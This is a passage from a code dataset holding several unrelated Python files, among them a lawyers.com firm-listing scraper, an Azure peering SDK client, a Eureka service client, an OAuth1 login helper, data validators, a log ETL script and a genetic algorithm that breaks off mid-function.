contact.find(\"li\", {\"class\":\"srl-phone\"}).a.attrs[\"data-phonenum\"]\n except:\n print(\"Not there *******************************************************\")\n except:\n print(\"Not there *******************************************************\")\n return phone\n\n\n# in csv_files directory\n\ndef mkfiles(arr_states, dct, dflt_pth):\n with open(\"totals_for_each_state.csv\", mode=\"w\") as stt_ttl_sheet:\n stt_writer = csv.writer(stt_ttl_sheet, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n stt_writer.writerow([\"State\", \"Total\"])\n for state in arr_states:\n try:\n stt_ttl = 0\n os.makedirs(f\"{state}\")\n os.chdir(f\"{state}\")\n # location: ... attsearch/csv_files/{state}\n with open(f\"totals_for_each_city.csv\", mode=\"w\") as city_ttl_sheet:\n city_writer = csv.writer(city_ttl_sheet, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n city_writer.writerow([\"City\", \"Total\"])\n print(f\"State: {state}\"*10)\n if len(state.split(\" \")) > 1: state_lnk = \"-\".join(state.lower().split(\" \"))\n else: state_lnk = state.lower()\n for city in dct[state]:\n os.makedirs(f\"{city}\")\n print(f\"City: {city}\"*10)\n if len(city.split(\" \")) > 1: city_lnk = \"-\".join(city.lower().split(\" \"))\n else: city_lnk = city.lower()\n os.chdir(f\"{city}\")\n # location: ... attsearch/csv_files/{state}/{city}\n city_ttl = 0\n for category in t_categories:\n\n cat_ttl = 0\n \n with open(f\"{category}.csv\", mode='w') as sheet:\n\n writer = csv.writer(sheet, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n writer.writerow([\"Firm\", \"Address\", \"Phone\"])\n\n print(f\"Category: {category}\"*10)\n\n if len(category.split(\" \")) > 1: category_lnk = \"-\".join(category.lower().split(\" \"))\n else: category_lnk = category.lower()\n pg = \"\"\n lawyers_com = f\"https://www.lawyers.com/all-legal-issues/{city_lnk}/{state_lnk}/law-firms{pg}/?={category_lnk}\"\n try:\n\n soup = mk_rqst(lawyers_com)\n\n #len(list(soup.find(\"ul\", {\"class\": \"pagination\"}).find_all(\"li\"))) > 0:\n try:\n pgs = int(soup.find(\"ul\", {\"class\": \"pagination\"}).find_all(\"li\")[7].text)\n except:\n pgs = 1\n\n for pg in range(pgs+1):\n pg = f\"-p{str(pg)}\"\n lawyers_com = f\"https://www.lawyers.com/all-legal-issues/{city_lnk}/{state_lnk}/law-firms{pg}/?={category_lnk}\"\n soup = mk_rqst(lawyers_com)\n for contact in soup.find_all(\"div\", {\"class\": \"search-results-list\"}):\n try:\n firm = next(contact.find(\"h2\", {\"class\": \"srl-name\"}).a.stripped_strings)\n loc = next(contact.find(\"p\", {\"class\": \"srl-serving\"}).stripped_strings)\n except:\n print(\"error with link: \", lawyers_com, \"\\n\", \"Page: \", pg, \"\\n\", \"Cat: \", category)\n continue\n phone = get_phone_num(contact)\n writer.writerow([firm, loc, phone])\n print(\"Firm: \", firm)\n print(\"Location: \", loc)\n print(\"Phone Num: \", phone)\n cat_ttl += 1\n except:\n continue\n city_ttl = cat_ttl\n city_writer.writerow([city, city_ttl])\n stt_ttl += city_ttl\n os.chdir(\"..\")\n # location: ... attsearch/csv_files/{state}\n os.chdir(\"..\")\n # location: ... attsearch/csv_files/\n stt_writer.writerow([state, stt_ttl])\n except:\n continue\n\nmkfiles(t_states, t_state_cities, default_path)","sub_path":"lawyer_com_search.py","file_name":"lawyer_com_search.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"2421546","text":"import load_paths\nimport extract_queries as EQ\nimport pd_to_text\nimport pandas as pd\n\nconfig_file = \"config.yml\"\ndatapaths = load_paths.load_configs(config_file)\n\nqueries = EQ.get_all(datapaths) #load dictionary with queries for all sets\n\n\n#create dataframes for each of the sets for original query to related question\ntrain_df = EQ.org_rel_df(queries['train'][1], queries['train'][0])\n\ntest_df = EQ.org_rel_df(queries['test'][1], queries['test'][0])\n\ndev_df = EQ.org_rel_df(queries['dev'][1], queries['dev'][0])\n\n\n\ntrain_df.to_csv(\"data_preprocessing/data_dumps/QQ_train.csv\")\ntest_df.to_csv(\"data_preprocessing/data_dumps/QQ_test-17.csv\")\ndev_df.to_csv(\"data_preprocessing/data_dumps/QQ_dev.csv\")\n\npd_to_text.return_text(train_df, \"train\")\npd_to_text.return_text(test_df, \"test\")\npd_to_text.return_text(dev_df, \"dev\")\n\n","sub_path":"feature_extraction/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"22049194","text":"import math\nimport logging\nfrom datetime import date\n\nnTypes = {0: \"Nordic Event\",\n\t\t1: \"Nordic Main Header\",\n\t\t2: \"Nordic Macroseismic Header\",\n\t\t3: \"Nordic Comment Header\",\n\t\t5: \"Nordic Error Header\",\n\t\t6: \"Nordic Waveform Header\",\n\t\t8: \"Nordic Phase Data\"}\n\nclass values():\n\tmaxInt = 9223372036854775807 \n\ndef validateInteger(val, valueName, low, high, limits, nType):\n\tif val == \"\":\n\t\treturn True\n\n\ttry:\n\t\tint(val)\n\texcept:\t\t\n\t\tmsg = \"Validation Error - {0}: {1} is not an integer! ({2})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, val))\n\t\treturn False\n\n\tif int(val) < low and limits:\n\t\tmsg = \"Validation Error - {0}: {1} is smaller than {2}! ({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, low, val))\n\t\treturn False\n\n\tif int(val) > high and limits:\n\t\tmsg = \"Validation Error - {0}: {1} is larger than {2}! ({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, high, val))\n\t\treturn False\n\n\treturn True\n\ndef validateFloat(val, valueName, low, high, limits, nType):\n\tif val == \"\":\n\t\treturn True\n\n\ttry:\n\t\tfloat(val)\n\texcept:\t\t\n\t\tmsg = \"Validation Error - {0}: {1} is not an float! ({2})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, val))\n\t\treturn False\n\n\tif math.isnan(float(val)):\n\t\tmsg = \"Validation Error - {0}: {1} is {2} which is not allowed!\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, val))\n\t\treturn False\n\n\tif math.isinf(float(val)):\n\t\tmsg = \"Validation Error - {0}: {1} is {2} which is not allowed!\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, val))\n\t\treturn False\n\n\tif float(val) < low and limits:\n\t\tmsg = \"Validation Error - {0}: {1} is smaller than {2}! ({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, low, val))\n\t\treturn False\n\n\tif float(val) > high and limits:\n\t\tmsg = \"Validation Error - {0}: {1} is larger than {2}! ({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], valueName, high, val))\n\t\treturn False\n\n\treturn True\n\ndef validateString(string, stringName, minlen, maxlen, listOfAllowed, isList, nType):\t\n\tif string is \"\":\n\t\treturn True\n\n\tif string not in listOfAllowed and isList:\n\t\tmsg = \"Validation Error - {0}: {1} not in the list of allowed strings! ({2})\\nAllowed:\\n\"\n\t\tfor allowed in listOfAllowed:\n\t\t\tmsg += \" -\" + allowed + \"\\n\"\n\t\tlogging.error(msg.format(nTypes[nType], stringName, string))\n\t\treturn False\n\n\tif minlen > -1 and len(string) < minlen:\n\t\tmsg = \"Validation Error - {0}: {1} is shorter than the minimum allowed length {2}! ({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], stringName, minlen, string))\n\t\treturn False\n\n\tif minlen > -1 and len(string) > maxlen:\n\t\tmsg = \"Validation Error - {0}: {1} is longer than the maximum allowed length {2}! ({3})\"\n\t\tlogging.error(msg.format(nTypes[nType], stringName, maxlen, string))\n\t\treturn False\n\n\treturn True\n\ndef validateDate(dateS, dateName, nType):\n\tif dateS == \"\":\n\t\treturn True\n\t\n\ttry:\n\t\tdate(year=int(dateS[:4].strip()), month=int(dateS[5:7].strip()), day=int(dateS[8:].strip()))\n\texcept:\n\t\tmsg = \"Validation Error - {0}: {1} is not parsable into date!({2})\"\n\t\tlogging.error(msg.format(nTypes[nType], dateName, dateS))\n\t\treturn False\n\n\treturn True\n\n\ndef fixDate(nordic):\n\tif nordic.date[5] == \" \":\n\t\tnordic.date = nordic.date[:5] + \"0\" + nordic.date[6:]\n\tif nordic.date[8] == \" \":\n\t\tnordic.date = nordic.date[:8] + \"0\" + nordic.date[9:]\n\n","sub_path":"nor2qml/validation/validationTools.py","file_name":"validationTools.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"481571370","text":"import pandas as pd\n\nimport json\nwith open('encoder.json', 'r') as f:\n data = json.load(f)\n\ndef bytes_to_unicode():\n \"\"\"\n Returns list of utf-8 byte and a corresponding list of unicode strings.\n The reversible bpe codes work on unicode strings.\n This means you need a large # of unicode characters in your vocab if you want to avoid UNKs.\n When you're at something like a 10B token dataset you end up needing around 5K for decent coverage.\n This is a signficant percentage of your normal, say, 32K bpe vocab.\n To avoid that, we want lookup tables between utf-8 bytes and unicode strings.\n And avoids mapping to whitespace/control characters the bpe code barfs on.\n \"\"\"\n bs = list(range(ord(\"!\"), ord(\"~\")+1))+list(range(ord(\"¡\"), ord(\"¬\")+1))+list(range(ord(\"®\"), ord(\"ÿ\")+1))\n cs = bs[:]\n n = 0\n for b in range(2**8):\n if b not in bs:\n bs.append(b)\n cs.append(2**8+n)\n n += 1\n cs = [chr(n) for n in cs]\n return dict(zip(bs, cs))\n\ndecoder = {v:k for k,v in data.items()}\nbyte_encoder = bytes_to_unicode()\nbyte_decoder = {v:k for k, v in byte_encoder.items()}\n\ndef decoder_text(tokens):\n errors='replace'\n text = ''.join([decoder[token] for token in tokens])\n text = bytearray([byte_decoder[c] for c in text]).decode('utf-8', errors=errors)\n return text","sub_path":".ipynb_checkpoints/decodeLogits-checkpoint.py","file_name":"decodeLogits-checkpoint.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"63398918","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\n\nfrom copy import deepcopy\nfrom typing import Any, TYPE_CHECKING\n\nfrom azure.core.rest import HttpRequest, HttpResponse\nfrom azure.mgmt.core import ARMPipelineClient\n\nfrom . import models\nfrom ._configuration import PeeringManagementClientConfiguration\nfrom ._serialization import Deserializer, Serializer\nfrom .operations import (\n CdnPeeringPrefixesOperations,\n ConnectionMonitorTestsOperations,\n LegacyPeeringsOperations,\n LookingGlassOperations,\n Operations,\n PeerAsnsOperations,\n PeeringLocationsOperations,\n PeeringManagementClientOperationsMixin,\n PeeringServiceCountriesOperations,\n PeeringServiceLocationsOperations,\n PeeringServiceProvidersOperations,\n PeeringServicesOperations,\n PeeringsOperations,\n PrefixesOperations,\n ReceivedRoutesOperations,\n RegisteredAsnsOperations,\n RegisteredPrefixesOperations,\n RpUnbilledPrefixesOperations,\n)\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from azure.core.credentials import TokenCredential\n\n\nclass PeeringManagementClient(\n PeeringManagementClientOperationsMixin\n): # pylint: disable=client-accepts-api-version-keyword,too-many-instance-attributes\n \"\"\"Peering Client.\n\n :ivar cdn_peering_prefixes: CdnPeeringPrefixesOperations operations\n :vartype cdn_peering_prefixes: azure.mgmt.peering.operations.CdnPeeringPrefixesOperations\n :ivar legacy_peerings: LegacyPeeringsOperations operations\n :vartype legacy_peerings: azure.mgmt.peering.operations.LegacyPeeringsOperations\n :ivar looking_glass: LookingGlassOperations operations\n :vartype looking_glass: azure.mgmt.peering.operations.LookingGlassOperations\n :ivar operations: Operations operations\n :vartype operations: azure.mgmt.peering.operations.Operations\n :ivar peer_asns: PeerAsnsOperations operations\n :vartype peer_asns: azure.mgmt.peering.operations.PeerAsnsOperations\n :ivar peering_locations: PeeringLocationsOperations operations\n :vartype peering_locations: azure.mgmt.peering.operations.PeeringLocationsOperations\n :ivar registered_asns: RegisteredAsnsOperations operations\n :vartype registered_asns: azure.mgmt.peering.operations.RegisteredAsnsOperations\n :ivar registered_prefixes: RegisteredPrefixesOperations operations\n :vartype registered_prefixes: azure.mgmt.peering.operations.RegisteredPrefixesOperations\n :ivar peerings: PeeringsOperations operations\n :vartype peerings: azure.mgmt.peering.operations.PeeringsOperations\n :ivar received_routes: ReceivedRoutesOperations operations\n :vartype received_routes: azure.mgmt.peering.operations.ReceivedRoutesOperations\n :ivar connection_monitor_tests: ConnectionMonitorTestsOperations operations\n :vartype connection_monitor_tests:\n azure.mgmt.peering.operations.ConnectionMonitorTestsOperations\n :ivar peering_service_countries: PeeringServiceCountriesOperations operations\n :vartype peering_service_countries:\n azure.mgmt.peering.operations.PeeringServiceCountriesOperations\n :ivar peering_service_locations: PeeringServiceLocationsOperations operations\n :vartype peering_service_locations:\n azure.mgmt.peering.operations.PeeringServiceLocationsOperations\n :ivar prefixes: PrefixesOperations operations\n :vartype prefixes: azure.mgmt.peering.operations.PrefixesOperations\n :ivar peering_service_providers: PeeringServiceProvidersOperations operations\n :vartype peering_service_providers:\n azure.mgmt.peering.operations.PeeringServiceProvidersOperations\n :ivar peering_services: PeeringServicesOperations operations\n :vartype peering_services: azure.mgmt.peering.operations.PeeringServicesOperations\n :ivar rp_unbilled_prefixes: RpUnbilledPrefixesOperations operations\n :vartype rp_unbilled_prefixes: azure.mgmt.peering.operations.RpUnbilledPrefixesOperations\n :param credential: Credential needed for the client to connect to Azure. Required.\n :type credential: ~azure.core.credentials.TokenCredential\n :param subscription_id: The Azure subscription ID. Required.\n :type subscription_id: str\n :param base_url: Service URL. Default value is \"https://management.azure.com\".\n :type base_url: str\n :keyword api_version: Api Version. Default value is \"2022-10-01\". Note that overriding this\n default value may result in unsupported behavior.\n :paramtype api_version: str\n \"\"\"\n\n def __init__(\n self,\n credential: \"TokenCredential\",\n subscription_id: str,\n base_url: str = \"https://management.azure.com\",\n **kwargs: Any\n ) -> None:\n self._config = PeeringManagementClientConfiguration(\n credential=credential, subscription_id=subscription_id, **kwargs\n )\n self._client = ARMPipelineClient(base_url=base_url, config=self._config, **kwargs)\n\n client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}\n self._serialize = Serializer(client_models)\n self._deserialize = Deserializer(client_models)\n self._serialize.client_side_validation = False\n self.cdn_peering_prefixes = CdnPeeringPrefixesOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.legacy_peerings = LegacyPeeringsOperations(self._client, self._config, self._serialize, self._deserialize)\n self.looking_glass = LookingGlassOperations(self._client, self._config, self._serialize, self._deserialize)\n self.operations = Operations(self._client, self._config, self._serialize, self._deserialize)\n self.peer_asns = PeerAsnsOperations(self._client, self._config, self._serialize, self._deserialize)\n self.peering_locations = PeeringLocationsOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.registered_asns = RegisteredAsnsOperations(self._client, self._config, self._serialize, self._deserialize)\n self.registered_prefixes = RegisteredPrefixesOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.peerings = PeeringsOperations(self._client, self._config, self._serialize, self._deserialize)\n self.received_routes = ReceivedRoutesOperations(self._client, self._config, self._serialize, self._deserialize)\n self.connection_monitor_tests = ConnectionMonitorTestsOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.peering_service_countries = PeeringServiceCountriesOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.peering_service_locations = PeeringServiceLocationsOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.prefixes = PrefixesOperations(self._client, self._config, self._serialize, self._deserialize)\n self.peering_service_providers = PeeringServiceProvidersOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.peering_services = PeeringServicesOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n self.rp_unbilled_prefixes = RpUnbilledPrefixesOperations(\n self._client, self._config, self._serialize, self._deserialize\n )\n\n def _send_request(self, request: HttpRequest, **kwargs: Any) -> HttpResponse:\n \"\"\"Runs the network request through the client's chained policies.\n\n >>> from azure.core.rest import HttpRequest\n >>> request = HttpRequest(\"GET\", \"https://www.example.org/\")\n \n >>> response = client._send_request(request)\n \n\n For more information on this code flow, see https://aka.ms/azsdk/dpcodegen/python/send_request\n\n :param request: The network request you want to make. Required.\n :type request: ~azure.core.rest.HttpRequest\n :keyword bool stream: Whether the response payload will be streamed. Defaults to False.\n :return: The response of your network call. Does not do error handling on your response.\n :rtype: ~azure.core.rest.HttpResponse\n \"\"\"\n\n request_copy = deepcopy(request)\n request_copy.url = self._client.format_url(request_copy.url)\n return self._client.send_request(request_copy, **kwargs)\n\n def close(self):\n # type: () -> None\n self._client.close()\n\n def __enter__(self):\n # type: () -> PeeringManagementClient\n self._client.__enter__()\n return self\n\n def __exit__(self, *exc_details):\n # type: (Any) -> None\n self._client.__exit__(*exc_details)\n","sub_path":"sdk/peering/azure-mgmt-peering/azure/mgmt/peering/_peering_management_client.py","file_name":"_peering_management_client.py","file_ext":"py","file_size_in_byte":9222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"556694455","text":"import logging\nfrom typing import Dict, Any\n\nimport py_eureka_client.eureka_client as eureka_client\n\nfrom cidemiasecurity.clients.alternate_worker import _walker_generator\nfrom cidemiasecurity.config.loader import get_config\nfrom cidemiasecurity.security.random import generate_nonce\n\nlog = logging.getLogger(__file__)\n\n\ndef internal_get_config(current_value, name, env_name, raise_error: bool = False, caster=None):\n if not current_value:\n current_value = get_config(env_name, None)\n if raise_error and not current_value:\n log.error(f\"Halt registering Eureka client. Either give the {name} or set {env_name} environment\")\n raise ValueError\n log.warning(f\"No {name}. Will use {current_value} read from {env_name} environment\")\n\n return caster(current_value) if (caster and current_value) else current_value\n\n\nasync def init_client(eureka_url: str = None, application_name: str = None, instance_port: int = None,\n instance_id: str = None, instance_host: str = None, instance_ip: str = None):\n \"\"\"\n The flowing code will register your server to eureka server and also start to send heartbeat every 30 seconds\n :param eureka_url: str -> The URL of the Eureka server\n :param application_name: str -> The application name\n :param instance_port: int -> The instance port\n :param instance_id: str -> The instance id\n :param instance_host: str -> The instance host\n :param instance_ip: str -> The instance ip\n :return:\n \"\"\"\n try:\n eureka_url = internal_get_config(eureka_url, \"Eureka URL\", \"EUREKA_URL\", True)\n application_name = internal_get_config(application_name, \"Application name\", \"APP_NAME\", True)\n instance_port = internal_get_config(instance_port, \"instance port given\", \"APP_PORT\", False, int)\n except ValueError as e:\n log.error(f\"Error when starting Eureka. Lack of parameter: {str(e)}\")\n return False\n if not instance_id:\n instance_id = f\"{application_name}:{generate_nonce(21)}\"\n log.warning(f\"Not instance id given. Will use {instance_id}\")\n if not instance_host:\n instance_host = internal_get_config(None, \"Domain name\", \"DOMAIN_NAME\", False) or \"\"\n log.info(f\"Registering {application_name} to Eureka: {eureka_url}\")\n eureka_client.init(eureka_server=eureka_url, app_name=application_name, instance_port=instance_port,\n instance_id=instance_id, instance_host=instance_host, ha_strategy=eureka_client.HA_STRATEGY_STICK)\n\n\nclass MicroServiceClient:\n \"\"\"\n Base class for handling calls to micro services\n \"\"\"\n def __init__(self, service_name: str, base_url: str):\n self.service_name = service_name\n self.base_url = base_url\n self.default_headers = {\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"}\n\n def _get_url(self, suffix_url, params: Dict[str, Any] = None, headers: Dict[str, Any] = None):\n # return eureka_client.do_service(self.service_name, self.base_url + suffix_url, headers=headers, return_type=\"json\")\n return eureka_client.walk_nodes(self.service_name, self.base_url + suffix_url,\n walker=_walker_generator(\"get\", params=params, headers=headers))\n\n def _post_url(self, suffix_url, data, headers=None):\n return eureka_client.walk_nodes(self.service_name, self.base_url + suffix_url,\n walker=_walker_generator(\"post\", json=data, headers=headers))\n\n def _put_url(self, suffix_url, data, headers=None):\n return eureka_client.walk_nodes(self.service_name, self.base_url + suffix_url,\n walker=_walker_generator(\"put\", json=data, headers=headers))\n\n def _delete_url(self, suffix_url, data, headers=None):\n return eureka_client.walk_nodes(self.service_name, self.base_url + suffix_url,\n walker=_walker_generator(\"delete\", json=data, headers=headers))\n","sub_path":"cidemiasecurity/clients/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"370112763","text":"# -*- coding: utf-8 -*-\n# oauth flow in simple words: http://pyoauth.readthedocs.org/en/latest/guides/oauth1.html\n\nfrom requests_oauthlib import OAuth1Session\nfrom six.moves import input\n\nfrom settings import CLIENT_KEY, CLIENT_SECRET, API_HOST\n\n\ndef get_api():\n request_token_url = '{}/oauth/initiate'.format(API_HOST)\n authorization_base_url = '{}/oauth/authorize'.format(API_HOST)\n access_token_url = '{}/oauth/token'.format(API_HOST)\n callback_uri = 'http://127.0.0.1/cb' # can be pretty random in this case\n\n # initiate Oauth by fetching request token\n api = OAuth1Session(\n CLIENT_KEY, client_secret=CLIENT_SECRET, callback_uri=callback_uri)\n api.fetch_request_token(request_token_url)\n\n # ask user to visit authorization URL and paste response\n authorization_url = api.authorization_url(authorization_base_url)\n print('Please go here and authorize: ')\n print(authorization_url)\n redirect_response = input('Paste the full redirect URL here: ')\n\n # parse authorization response (contains callback_uri) and access token\n api.parse_authorization_response(redirect_response)\n api.fetch_access_token(access_token_url)\n return api\n","sub_path":"oauth_dance.py","file_name":"oauth_dance.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"364561195","text":"import shutil\r\n\r\nPIN_COUNT = 6000000\r\n\r\nPIN_FILE = \"pins/%s.pins\"\r\nPIN_FILE_BACKUP = \"pins/%s.bak\"\r\n\r\nBOARD_CATEGORIES = [\"animals\", \"architecture\", \"art\", \"cars_motorcycles\", \r\n \"celebrities\", \"design\", \"diy_crafts\", \"education\", \r\n \"film_music_books\", \"food_drink\", \"gardening\", \"geek\", \r\n \"hair_beauty\", \"health_fitness\", \"history\", \"holidays_events\", \r\n \"home_decor\", \"humor\", \"illustrations_posters\", \"kids\", \r\n \"mens_fashion\", \"outdoors\", \"photography\", \"products\", \r\n \"quotes\", \"science_nature\", \"sports\", \"tattoos\", \"technology\", \r\n \"travel\", \"weddings\", \"womens_fashion\"]\r\n\r\ndef count_pins(category):\r\n pin_file = open(PIN_FILE % category)\r\n pins = pin_file.readlines()\r\n pin_file.close()\r\n return len(pins)\r\n\r\ndef count_unique_pins(category):\r\n pin_file = open(PIN_FILE % category)\r\n pins = pin_file.readlines()\r\n pin_file.close()\r\n return len(set(pins))\r\n\r\ndef truncate_pin_files(category):\r\n shutil.copy2(PIN_FILE % category, PIN_FILE_BACKUP % category)\r\n \r\n pin_file = open(PIN_FILE % category)\r\n pins = pin_file.readlines()\r\n pin_file.close()\r\n \r\n pin_file = open(PIN_FILE % category, \"w\")\r\n pin_file.writelines(list(set(pins))[:min(PIN_COUNT, len(pins))])\r\n pin_file.close()\r\n \r\nif __name__ == \"__main__\":\r\n for category in BOARD_CATEGORIES[27:]: # last = science_nature\r\n truncate_pin_files(category)\r\n print(\"%s\\t\\t%d\" % (category, count_unique_pins(category)))","sub_path":"src/ca/utoronto/pinterest/data/python/pin_data_processor.py","file_name":"pin_data_processor.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"156642228","text":"str_a=input(\"What is the first number? \")\nstr_b=input(\"What is the second number? \")\n\na=float(str_a)\nb=float(str_b)\n\nprint(\n\"\"\"\n{is_a} + {is_b} = {plus}\n{is_a} - {is_b} = {minus}\n{is_a} * {is_b} = {mulitply}\n{is_a} / {is_b} = {divide}\n\"\"\"\n.format(is_a=a, is_b=b, plus=a+b, minus=a-b, mulitply=a*b, divide=a/b)\n )\n\n","sub_path":"05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"475472265","text":"# encoding: utf-8\n\"\"\"\n机器服务器逻辑日志ETL。\n作用是读取然后按照日期和接口合并到一天,用于数据验证。因为目前日志里面的日期是收集日期。\n@author Yuriseus\n@create 16-11-17 下午4:34\n\"\"\"\nimport json\nimport os\n\nfrom service.minik_server.active_user import ActiveUserService\nfrom service.minik_server.consume import ConsumeService\nfrom service.minik_server.game_session import GameSessionService\nfrom service.minik_server.show_user_info import ShowUserInfoService\nfrom service.minik_server.song_play import SongPlayService\nfrom util.date import DateUtil\n\n\nclass MinikServerInterfaceETL(object):\n def __init__(self):\n super(MinikServerInterfaceETL, self).__init__()\n self.files = {}\n\n def process_start(self, date):\n \"\"\"\n 开始处理\n :param date: yyyy-mm-dd\n :return:\n \"\"\"\n year = date[0:4]\n source_path = '/data/disk1/logdata/minik_server/logic/%s/%s.log' % (year, date)\n self.process_file(source_path)\n\n def process_file(self, file_path):\n with open(file_path) as f:\n for line in f:\n d = self.split(line)\n if self.filter(d):\n self.process_after_clean(d)\n self.process_end()\n\n def split(self, line):\n d = {}\n line = line.replace('\\n', '')\n tmp = line.split('&')\n d['timestamp'] = tmp[0]\n d['mid'] = tmp[1]\n d['interface'] = tmp[2]\n try:\n # 因为有异常情况导致解析的日志中的格式是错误的\n d['data'] = json.loads(tmp[3]) # 字典\n except Exception:\n d['data'] = None\n d['exec_version'] = tmp[4] # 程序版本\n d['ui_version'] = tmp[5] # UI版本\n return d\n\n def filter(self, d):\n data = d['data']\n if data:\n return True\n return False\n\n def process_after_clean(self, d):\n interface = d['interface']\n data = self.get_clean_data(d, interface)\n\n if data:\n # 数据必须包含时间戳\n timestamp = int(data['timestamp'])\n if timestamp >= 1451577600: # 2016-01-01 00:00:00\n date = DateUtil.timestamp2date(timestamp, '%Y-%m-%d')\n year = date[0:4]\n data = str(data).replace(\"u'\", '\"') # 标准json是双引号的\n data = data.replace(\"'\", '\"')\n # 目录不存在需要创建\n base_dir = '/data/disk1/clean_data/minik_server/logic/%(year)s/%(date)s/' % {'year': year, 'date': date}\n if not os.path.exists(base_dir):\n os.makedirs(base_dir)\n\n # 每个接口一个文件\n interface_file_path = base_dir + '%(interface)s.log' % {'interface': interface}\n if interface_file_path not in self.files:\n target_file = open(interface_file_path, 'a+')\n self.files[interface_file_path] = target_file\n\n target_file = self.files[interface_file_path]\n target_file.write('%s\\n' % data)\n\n def get_clean_data(self, d, interface):\n \"\"\"\n 获取清洗后的数据。\n :param d:\n :param interface:\n :return: dict 必须包含时间戳timestamp\n \"\"\"\n data = None\n\n if interface == 'connector.entryHandler.macPlayingModeGameOverV2':\n service = GameSessionService()\n if service.filter(d):\n data = service.process_data(d)\n elif interface == 'connector.playerHandler.playerFinishSong':\n service = SongPlayService()\n if service.filter(d):\n data = service.process_data(d)\n elif interface == 'onWebxinLogin':\n service = ActiveUserService()\n if service.filter(d):\n data = service.process_data(d)\n elif interface == 'onShowUserInfo':\n service = ShowUserInfoService()\n if service.filter(d):\n data = service.process_data(d)\n elif interface == 'connector.entryHandler.accountRecordInfo':\n service = ConsumeService()\n if service.filter(d):\n data = service.process_data(d)\n else:\n if self.filter(d):\n data = d['data']\n data['timestamp'] = d['timestamp']\n return data\n\n def process_end(self):\n \"\"\"\n 处理结束,关闭所有打��的文件\n :return:\n \"\"\"\n for file_path, file_handler in self.files.items():\n file_handler.close()\n\n\n\n\n","sub_path":"DataCompute/python/etl/minik_server_interface.py","file_name":"minik_server_interface.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"374352076","text":"import copy\nfrom PyQt5.QtCore import QThread, pyqtSignal\nimport numpy as np\n\nCARGA = 20\n\nclass Individuo:\n def __init__(self, alelos, longitud_gen, cromosoma):\n self._alelos = alelos\n self._longitud_gen = longitud_gen\n self._cromosoma = cromosoma\n self._fitness = 0\n\nclass AGB(QThread):\n countChanged = pyqtSignal(int)\n def __init__(self, cantidad_individuos, alelos, tamano_gen, generaciones, p, problema):\n super(QThread, self).__init__()\n self._cantidad_individuos = cantidad_individuos\n self._alelos = alelos\n self._tamano_gen = tamano_gen\n self._generaciones = generaciones\n self._p = p\n self._problema = problema\n self._individuos = np.array([])\n self._historicos = []\n self.historicos = []\n self._generacion = 0\n\n def run(self):\n self.optimizar()\n\n def optimizar(self):\n self.crearIndividuos()\n self._mejor_historico = self._individuos[0]\n self._generacion = 0\n progreso = 100 / self._generaciones\n progreso_cont = 0\n while self._generacion < self._generaciones:\n self.evaluaIndividuos()\n hijos = np.array([])\n while len(hijos) < len(self._individuos):\n padre1 = self.ruleta()\n padre2 = self.ruleta()\n while padre1 == padre2:\n padre2 = self.ruleta()\n h1, h2 = self.cruza(self._individuos[padre1], self._individuos[padre2])\n hijos = np.append(hijos, [h1])\n hijos = np.append(hijos, [h2])\n self.mutacion(hijos)\n self._individuos = np.copy(hijos)\n self._individuos[np.random.randint(len(self._individuos))] = copy.deepcopy(self._mejor_historico)\n \n # print(\"Generación: \", self._generacion, 'Mejor Histórico: ', self._mejor_historico._cromosoma, self._mejor_historico._fitness)\n self.historicos.append(self._mejor_historico._fitness)\n\n self._generacion += 1\n progreso_cont += progreso\n if int(progreso_cont) % 5:\n self.countChanged.emit(progreso_cont)\n\n def crearIndividuos(self):\n for _ in range(self._cantidad_individuos):\n 